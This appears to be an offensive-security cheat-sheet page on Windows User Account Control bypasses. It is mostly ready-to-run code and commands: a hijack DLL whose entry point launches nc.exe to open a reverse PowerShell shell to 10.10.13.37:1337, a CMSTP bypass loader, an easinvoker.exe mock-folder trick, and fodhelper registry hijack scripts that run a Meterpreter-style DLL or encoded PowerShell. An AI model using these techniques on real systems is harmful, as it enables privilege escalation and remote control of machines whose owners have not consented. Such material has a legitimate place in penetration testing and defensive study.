TwitterGitHubBlogSponsor

UAC Bypass

User Account Control

Enumeration

Check current token privileges and UAC settings with Seatbelt:

PS > .\Seatbelt.exe TokenPrivileges UAC

SystemPropertiesAdvanced.exe

srrstr.dll DLL hijacking.

srrstr.c
// i686-w64-mingw32-g++ srrstr.c -lws2_32 -o srrstr.dll -shared

#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved) {
    switch(dwReason) {
        case DLL_PROCESS_ATTACH:
            WinExec("C:\\Users\\<USERNAME>\\Documents\\nc.exe 10.10.13.37 1337 -e powershell", 0);
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }

    return 0;
}

Upload srrstr.dll to C:\Users\%USERNAME%\AppData\Local\Microsoft\WindowsApps\ and check it:

PS > rundll32.exe srrstr.dll,xyz

Exec and get a shell ("requires an interactive window station"):

PS > cmd /c C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

cmstp.exe

Compile from source, load and execute:

PS > Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "CMSTP-UAC-Bypass.dll"
PS > [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\CMSTP-UAC-Bypass.dll"))
PS > [CMSTPBypass]::Execute("C:\Windows\System32\cmd.exe")

Load from a weaponized PowerShell and execute:

PS > Bypass-UAC -C "C:\Windows\System32\cmd.exe"

easinvoker.exe

mkdir "\\?\C:\Windows "
mkdir "\\?\C:\Windows \System32"
copy c:\windows\system32\easinvoker.exe "C:\Windows \System32"
copy netutils.dll "C:\Windows \System32"
"C:\Windows \System32\easinvoker.exe"
del /q "C:\Windows \System32\*"
rmdir "C:\Windows \System32"
rmdir "C:\Windows \"

fodhelper.exe

Create and set registry values (the payload is generated with charlotte.py):

PS > New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
PS > New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
PS > Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "rundll32 C:\Windows\System32\spool\drivers\color\met.dll, SUJIzDKv" -Force

Trigger fodhelper.exe:

PS > Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

Clean up:

PS > Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

Another way to do it with a script (hijacking PowerShell executable):

fod.ps1
function Fod {
    $cmd = "C:\Windows\Tasks\foo.exe -enc <BASE64_CMD>"
    
    copy C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Tasks\foo.exe
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force -ErrorAction SilentlyContinue
    
    New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
    New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
    Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $cmd -Force
    
    Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
    Start-Sleep -s 3
    
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force -ErrorAction SilentlyContinue
}

The same thing with ProgID abuse:

fod-ng.ps1
function FodNG {
    Param (
        [String]$cmd = "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -NoP -NoLogo -exec Bypass -enc <BASE64_CMD>"
    )
    
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force -ErrorAction SilentlyContinue

    New-Item "HKCU:\Software\Classes\.uacbypass\Shell\Open\command" -Force
    New-ItemProperty -Path "HKCU:\Software\Classes\.uacbypass\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
    Set-ItemProperty "HKCU:\Software\Classes\.uacbypass\Shell\Open\command" -Name "(default)" -Value $cmd -Force
    
    New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
    Set-ItemProperty  "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".uacbypass" -Force
    
    Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
    Start-Sleep 3
    
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
    Remove-Item "HKCU:\Software\Classes\.uacbypass\" -Recurse -Force
}

SilentCleanup

SCM UAC Bypass

Task Scheduler

Tricks

Bypass UAC for file read/write:

Cmd > net use A: \\127.0.0.1\C$
Cmd > A:
Cmd > cd \Windows\System32
Cmd > echo test > test.txt
Cmd > dir test.txt

Last updated